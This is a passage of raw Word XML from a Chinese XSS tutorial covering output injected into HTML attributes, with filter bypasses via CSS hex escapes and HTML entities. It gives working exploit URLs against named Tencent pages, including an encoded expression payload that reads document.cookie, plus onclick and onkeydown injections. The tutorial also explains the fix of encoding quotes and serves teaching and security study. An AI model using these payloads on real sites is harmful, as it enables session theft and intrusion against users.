          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤&lt;/xxx&gt;组合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE7298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9.</w:t>
      </w:r>
      <w:r w:rsidR="00FE7298" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.针对输出在不同的场景，进行合适的过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00755F50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 w:rsidR="00507804">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x1aoh4i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009A6E70" w:rsidRDefault="00C16395" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三</w:t>
      </w:r>
      <w:r w:rsidR="00AD0511" w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:t>输出在</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009A6E70">
        <w:t>属性里的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971259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</w:t>
      </w:r>
      <w:r w:rsidR="00FC1936" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>心伤的瘦子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</w:t>
      </w:r>
      <w:r w:rsidR="006D0AB5" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PKAV技术</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006D0AB5" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006D0AB5" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1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</w:t>
      </w:r>
      <w:r w:rsidR="006D0AB5" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.pkav.net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和前面的不一样的时，有时候，输出会出现在HTML标签的属性之中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例如：&lt;inputvalue="输出"&gt;、&lt;imgonload="...[输出]..."&gt;，再比如&lt;bodystyle="...[输出]..."&gt;..这个时候怎么办呢？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详细说明：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB7797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907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>大网站一般不是吃素的。前面讲到的基本情况，一般都很少遇到了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2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2.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个时候我们可以把目光发展一下，找一找在【输出】出现在HTML属性里的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004315A4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3.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最为典型的一种情况，是下面这样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004315A4" w:rsidRPr="009C207F" w:rsidRDefault="00961B4D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tp://xxxx.com/search.php?word</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>乌云</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>欢迎您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ML代码里则是下面这样情况的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74C63" w:rsidRPr="009C207F" w:rsidTr="00674C63">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00674C63" w:rsidRPr="009C207F" w:rsidRDefault="00674C6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关键词：&lt;inputtype="text"value="乌云欢迎您"/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001443B2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果这里的word没过滤双引号。就会有以下的情况发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001443B2" w:rsidRPr="009C207F" w:rsidRDefault="00D7655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tp://xxxx.com/search.php?word</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>乌云</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>欢迎您</w:t>
      </w:r>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>onclick="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001443B2" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1)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对应的源代码如下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74C63" w:rsidRPr="009C207F" w:rsidTr="00674C63">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00674C63" w:rsidRPr="009C207F" w:rsidRDefault="00674C6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&lt;inputtype="text"value="乌云欢迎您"onclick="alert(1)"/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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093CD6C7" wp14:editId="7E084231">
            <wp:extent cx="5274310" cy="8312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F1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497" w:rsidP="006D01AD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8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么当用户点击这个文本框时，就会触发alert(1)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004315A4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4.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当然理想</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是美好的，现实总是残酷的，我水平有限，并没有在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯找到</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样的例子。</w:t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因为绝大部分这样的情况，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯都会</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>做出相应的过滤。</w:t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过滤方法也挺简单，将"过滤为&amp;quot;就行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过滤后的代码如下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5F35E3" w:rsidRPr="009C207F" w:rsidTr="005F35E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="005F35E3" w:rsidRPr="009C207F" w:rsidRDefault="005F35E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&lt;inputtype="text"value="乌云欢迎您&amp;quot;onclick=&amp;quot;alert(1)"/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0028158C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5.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般来说，上面的情况，过滤了"，可以说是高枕无忧了，但是事实并非如此。某些情况下。我们依然可以继续XSS。下面</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以腾讯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1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6.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先看第一种场景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3269C0" w:rsidRPr="009C207F" w:rsidTr="003269C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="003269C0" w:rsidRPr="009C207F" w:rsidRDefault="003269C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http://follow.v.t.qq.com/index.php?c=follow&amp;a=index&amp;appkey=801004516&amp;bg=我是一个兵,爱国爱人民&amp;hsize=80&amp;name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,w</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>eibotalk,lee007,jxzhongweizhi,lihaipengtx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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里的bg参数过滤了【几乎】所有的东西。但是它输出在了&lt;bodystyle="[这里]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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DE050F5" wp14:editId="418E83EC">
            <wp:extent cx="5272768" cy="19431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F1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497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9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更重要的是，这里没有过滤\，反斜线，而css里，允许使用转义字符,\+ascii16进制形式。这样一来，我们就可以构造利用语句啦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里过滤了expression,我们也可以轻松的用expr\65ssion绕过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E2ED7" w:rsidRPr="009C207F" w:rsidTr="002E2ED7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002E2ED7" w:rsidRPr="009C207F" w:rsidRDefault="002E2ED7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follow.v.t.qq.com/index.php?c=follow&amp;a=index&amp;appkey=801004516&amp;bg=;w:expr\65ssion\28%20eval\28\27\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\64\6f\63\75\6d\65\6e\74\2e\63\6f\6f\6b\69\65\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\7d\27\29\29&amp;hsize=80&amp;name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,weibotalk,lee007,jxzhongweizhi,lihaipengtx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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效果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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367C210" wp14:editId="0E8CA4AD">
            <wp:extent cx="5274310" cy="26282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F1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497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0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种情况，遗憾之处在于，基于cssexpression的XSS已经进入暮年了，只有在IE6，7下方能触发，受众面小。这里只是作为一个案例来讲</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>讲</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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Tips:至于这里的转义是如何写的：步骤如下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E7805" w:rsidRPr="009C207F" w:rsidTr="006E7805">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006E7805" w:rsidRPr="009C207F" w:rsidRDefault="006E7805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例如e的ascii16进制是65,我们就写为\65</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E7805" w:rsidRPr="009C207F" w:rsidRDefault="006E7805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expression-&gt;expr\65ssion。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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本例缺陷点代码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04112" w:rsidRPr="009C207F" w:rsidTr="00904112">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00904112" w:rsidRPr="009C207F" w:rsidRDefault="0090411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&lt;bodystyle="overflow:auto;background-color:#我是一个兵，爱国爱人民;"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0028158C" w:rsidRPr="009C207F" w:rsidRDefault="00AB779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7.</w:t>
      </w:r>
      <w:r w:rsidR="00907EC1" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再来看下一个在属性里的案例。这个例子也是比较常见的。比如：</w:t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  <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>&lt;HTML标签onXXXX="...[输出在这里].."&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的例子。</w:t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  <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>&lt;ahref="javascript:[输出在这里]"&gt;xxxx&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的例子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正好，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个例子中，以上2个情况一起出现了。我们以其中一种进行讲解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8B097B" w:rsidRPr="009C207F" w:rsidTr="008B097B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="008B097B" w:rsidRPr="009C207F" w:rsidRDefault="008B097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stock.finance.qq.com/report/search.php?searchtype_yjbg=yjjg&amp;searchvalue_yjbg=aaaaaaaaaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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看输出，如下，aaaaaaaa出现在了2个点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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496318D" wp14:editId="50F7CA9C">
            <wp:extent cx="5274310" cy="12312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F1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497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1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常规来说，因为onxxxx="[输出]"和href="javascript:[输出]"与&lt;script&gt;[输出]&lt;/script&gt;没有太大区别。因为[输出]所在的地方，都是javascript脚本。</w:t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但是&lt;script&gt;[输出]&lt;/script&gt;如果被过滤，往往没有太好的办法。</w:t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而上面这2种情况，则有一个很好的办法绕过过滤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Tips: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05E0F" w:rsidRPr="009C207F" w:rsidTr="00605E0F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00605E0F" w:rsidRPr="009C207F" w:rsidRDefault="00605E0F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在HTML属性中，会自动对实体字符进行转义。一个简单的比方。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00605E0F" w:rsidRPr="009C207F" w:rsidRDefault="00605E0F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imgsrc="1"onerror="alert(1)"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00605E0F" w:rsidRPr="009C207F" w:rsidRDefault="00605E0F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和</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00605E0F" w:rsidRPr="009C207F" w:rsidRDefault="00605E0F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imgsrc="1"onerror="alert&amp;#x28;1&amp;#x29;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00605E0F" w:rsidRPr="009C207F" w:rsidRDefault="00605E0F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是等效的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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换言之，只要上面的情况，没有过滤&amp;，#等符号，我们就可以写入任意字符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看看缺陷点的代码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5B5248" w:rsidRPr="009C207F" w:rsidTr="005B5248">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="005B5248" w:rsidRPr="009C207F" w:rsidRDefault="005B5248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li&gt;&lt;inputtype="text"id="pagenum"class="inputstyle0814"onkeydown="if((event.keyCode==13)&amp;&amp;(this.value!=''))location.href='http://stock.finance.qq.com/report/search.php?offset='+this.value+'&amp;searchtype_yjbg=yjjg&amp;searchvalue_yjbg=aaaaaaaaaa'"/&gt;&lt;/li&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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JS部分我们可以做以下构造,由于'被过滤，我们可以将'写为</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;#x27;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028158C" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1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location.href='..</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>......&amp;searchvalue_yjbg=aaaaaa'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028158C" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1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location.href='........&amp;searc</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hvalue_yjbg=aaaaaa'+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1)+''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028158C" w:rsidRPr="009C207F" w:rsidRDefault="00907EC1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location.href='........&amp;searchvalue_yjbg</w:t>
      </w:r>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=aaaaaa&amp;#x2</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>alert(1)+&amp;#x27;'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步骤如下：</w:t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接着我们把代码转换为url的编码。</w:t>
      </w:r>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;-&gt;%26</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AF0D33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0028158C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%23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最后利用代码如下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524677" w:rsidRPr="009C207F" w:rsidTr="00524677">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00524677" w:rsidRPr="009C207F" w:rsidRDefault="00524677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stock.finance.qq.com/report/search.php?searchtype_yjbg=yjjg&amp;searchvalue_yjbg=aaaaaaa%26%23x27;%2balert(1)%2b%26%23x27;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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用户点击页面[GO]按钮触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A2497" w:rsidRPr="009C207F" w:rsidRDefault="00932DF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D249B16" wp14:editId="105E81B9">
            <wp:extent cx="5274310" cy="34785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F1" w:rsidRPr="009C207F" w:rsidRDefault="007A2497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2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8158C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由于缺陷点是发生在onkeydown或a标签的href属性中，无法自动触发，因而使得威胁减小，如果是发生在img的onload属性，则非常可能导致自动触发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907EC1" w:rsidRPr="009C207F" w:rsidRDefault="00907EC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缺陷页面的&lt;ahref=""&gt;触发点的代码如下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91883" w:rsidRPr="009C207F" w:rsidTr="00991883">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
